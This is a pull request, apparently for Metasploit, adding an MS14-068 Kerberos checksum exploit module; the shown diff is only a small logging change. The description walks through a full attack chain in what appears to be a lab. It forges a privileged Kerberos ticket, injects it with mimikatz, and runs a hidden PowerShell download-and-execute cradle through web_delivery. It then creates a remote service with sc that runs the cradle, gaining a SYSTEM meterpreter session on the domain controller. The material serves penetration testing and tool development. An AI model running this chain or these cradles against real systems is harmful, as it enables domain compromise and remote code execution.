### PR TITLE
Module for MS14-068, Kerberos Checksum (and krb protocol support)

### DIFF
--- a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
+++ b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
@@ -84,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary
     )
 
     unless res.msg_type == Rex::Proto::Kerberos::Model::AS_REP
-      vprint_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
+      print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
       print_error("#{peer} - Invalid AS-REP, aborting...")
       return
     end

--- a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
+++ b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
@@ -133,7 +133,7 @@ class Metasploit4 < Msf::Auxiliary
     )
 
     unless res.msg_type == Rex::Proto::Kerberos::Model::TGS_REP
-      vprint_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
+      print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
       print_error("#{peer} - Invalid TGS-REP, aborting...")
       return
     end


### PR DESCRIPTION
... plus the kerberos support needed on Rex and module mixin. The kerberos support isn't complete, but it's good enough to exploit ms14-068. So hopefully it's good enough for PR.

Verification
- [x] Be sure travis is green
- [x] Run specs locally, they should pass

```
$ rspec spec/lib/msf/kerberos/
Msf::Kerberos::Client::Base ............
Msf::Kerberos::Client::AsResponse ........
Msf::Kerberos::Client::AsRequest ..........
Msf::Kerberos::Client::TgsResponse ...
Msf::Kerberos::Client::CacheCredential ....................
Msf::Kerberos::Client::TgsRequest .........................
Msf::Kerberos::Client::Pac ...............

Finished in 0.25268 seconds
93 examples, 0 failures

Randomized with seed 51708

$ rspec spec/lib/rex/proto/kerberos/
Rex::Proto::Kerberos::Model::EncryptedData ........
Rex::Proto::Kerberos::Model::PrincipalName ........
Rex::Proto::Kerberos::Pac::LogonInfo .
Rex::Proto::Kerberos::Model::EncKdcResponse ............
Rex::Proto::Kerberos::CredentialCache::Credential .
Rex::Proto::Kerberos::Pac::Type .
Rex::Proto::Kerberos::Pac::ServerChecksum .
Rex::Proto::Kerberos::Pac::ClientInfo .
Rex::Proto::Kerberos::Model::KdcRequestBody ........................
Rex::Proto::Kerberos::CredentialCache::Principal .
Rex::Proto::Kerberos::Model::ApReq .
Rex::Proto::Kerberos::Client .....
Rex::Proto::Kerberos::Model::AuthorizationData ..
Rex::Proto::Kerberos::CredentialCache::Time .
Rex::Proto::Kerberos::CredentialCache::Cache .
Rex::Proto::Kerberos::Model::PreAuthPacRequest ...
Rex::Proto::Kerberos::Model::Authenticator .
Rex::Proto::Kerberos::Model::Checksum .
Rex::Proto::Kerberos::Model::KdcRequest ................
Rex::Proto::Kerberos::Pac::PrivSvrChecksum .
Rex::Proto::Kerberos::Model::KrbError ...............
Rex::Proto::Kerberos::Model::PreAuthEncTimeStamp ......
Rex::Proto::Kerberos::Model::KdcResponse ......
Rex::Proto::Kerberos::Model::Ticket ......
Rex::Proto::Kerberos::Model::PreAuthData ........

Finished in 0.1104 seconds
131 examples, 0 failures

Randomized with seed 51004
```
- [x] Install a vulnerable Windows domain using a Windows 2008 domain controller
- [x] Run the module against the DC to retrieve a TGT ticket exported in a MIT Credential cache format

```
msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN DEMO.LOCAL
DOMAIN => DEMO.LOCAL
msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN_SID S-1-5-21-1755879683-3641577184-3486455962
DOMAIN_SID => S-1-5-21-1755879683-3641577184-3486455962
msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 172.16.158.135
RHOST => 172.16.158.135
msf auxiliary(ms14_068_kerberos_checksum) > set USER_SID 1000
USER_SID => 1000
msf auxiliary(ms14_068_kerberos_checksum) > set USER juan
USER => juan
msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD juan
PASSWORD => juan
msf auxiliary(ms14_068_kerberos_checksum) > run

[*] 172.16.158.135:88 - Connecting with the KDC...
[*] 172.16.158.135:88 - Sending AS-REQ...
[*] 172.16.158.135:88 - Parsing AS-REP...
[*] 172.16.158.135:88 - Sending TGS-REQ...
[+] 172.16.158.135:88 - Valid TGS-Response, extracting credentials...
[+] 172.16.158.135:88 - MIT Credential Cache saved on /Users/jvazquez/.msf4/loot/20141222175751_default_172.16.158.135_windows.kerberos_452461.bin
[*] Auxiliary module execution completed
```
- [x] Import the MIT Credential cache with Mimikatz, the meterpreter extension doesn't support MIT CC format atm, but it can be converted trivially with mimikatz. For testing purposes, you can use mimikatz directly on the target system to import the ticket from the MIT Cache Credential file:

```
kerberos::ptc "20141222175751_default_172.16.158.135_windows.kerberos_452461.bin" /export
Principal : (01) : juan ; @ DEMO.LOCAL

Data 0
           Start/End/MaxRenew: 12/23/2014 12:57:51 AM ; 12/23/2014 10:57:51 AM
 12/30/2014 12:57:51 AM
           Service Name (01) : krbtgt ; DEMO.LOCAL ; @ DEMO.LOCAL
           Target Name  (01) : krbtgt ; DEMO.LOCAL ; @ DEMO.LOCAL
           Client Name  (01) : juan ; @ DEMO.LOCAL
           Flags 00000000    :
           Session Key       : 0x00000017 - rc4_hmac_nt
             8cece387b84ca18a87a7b447f154fb71
           Ticket            : 0x00000000 - null              ; kvno = 2
[...]
           * Injecting ticket : OK
```
- [x] After importing the MIT Cache Credential feel free to test your new privileges. For example, connect to a shared resource only available for Domain Administrators from the target. 

Also you can get privileged sessions in the domain. Several methods have been already discussed (see module references). For example:

```
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     172.16.158.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     172.16.158.1     yes       The listen address
   LPORT     4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PSH


msf exploit(web_delivery) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4445
msf exploit(web_delivery) > [*] Using URL: http://172.16.158.1:8080/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.158.1:8080/'))

msf exploit(web_delivery) > sessions

Active sessions
===============

  Id  Type                   Information            Connection
  --  ----                   -----------            ----------
  1   meterpreter x86/win32  DEMO\juan @ EXPLOITER  172.16.158.1:4444 -> 172.16.158.131:64611 (172.16.158.131)

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1936 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\juan\Desktop>sc \\WIN-F46QAN3U3UH.demo.local\ create psh_test binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.158.1:8080/'))"
sc \\WIN-F46QAN3U3UH.demo.local\ create psh_test binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.158.1:8080/'))"
[SC] CreateService SUCCESS

C:\Users\juan\Desktop>sc \\WIN-F46QAN3U3UH.demo.local\ start psh_test
sc \\WIN-F46QAN3U3UH.demo.local\ start psh_test
^Z
Background channel 2? [y/N]  y
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 3220 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\juan\Desktop>
[*] 172.16.158.135   web_delivery - Delivering Payload
[*] Sending stage (770048 bytes) to 172.16.158.135


C:\Users\juan\Desktop>se^R


C:\Users\juan\Desktop>^Z
Background channel 3? [y/N]  y
[-] Error running command shell: ThreadError can't be called from trap context
meterpreter > sessions
[-] Unknown command: sessions.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(web_delivery) > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  DEMO\juan @ EXPLOITER                  172.16.158.1:4444 -> 172.16.158.131:64611 (172.16.158.131)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-F46QAN3U3UH  172.16.158.1:4445 -> 172.16.158.135:59025 (172.16.158.135)

msf exploit(web_delivery) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
